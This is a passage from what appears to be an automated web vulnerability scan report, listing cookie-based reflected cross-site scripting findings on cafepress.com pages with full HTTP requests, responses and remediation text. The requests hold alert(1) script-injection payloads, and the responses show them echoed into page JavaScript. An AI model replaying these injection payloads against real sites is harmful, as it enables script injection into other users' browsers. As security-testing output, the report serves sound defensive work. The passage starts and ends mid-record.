Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b2e9e</script><script>alert(1)</script>cefee2eaa5b; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59387
Date: Sun, 26 Dec 2010 13:49:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'b2e9e</script><script>alert(1)</script>cefee2eaa5b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+keepsake_boxes

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18c76"-alert(1)-"2689714fbb2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59056
Date: Sun, 26 Dec 2010 13:49:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+keepsake_boxes

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f272a</script><script>alert(1)</script>d1528753cbe was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f272a</script><script>alert(1)</script>d1528753cbe; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59083
Date: Sun, 26 Dec 2010 13:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'f272a</script><script>alert(1)</script>d1528753cbe'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+license_plate_frames

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe28"-alert(1)-"4e9cbe178c4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59959
Date: Sun, 26 Dec 2010 13:48:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+license_plate_frames

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df2e</script><script>alert(1)</script>12b946216a2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2df2e</script><script>alert(1)</script>12b946216a2; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59978
Date: Sun, 26 Dec 2010 13:48:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '2df2e</script><script>alert(1)</script>12b946216a2'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.48. http://www.cafepress.com/+magnets [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+magnets

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b1e"-alert(1)-"48ef400b324 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 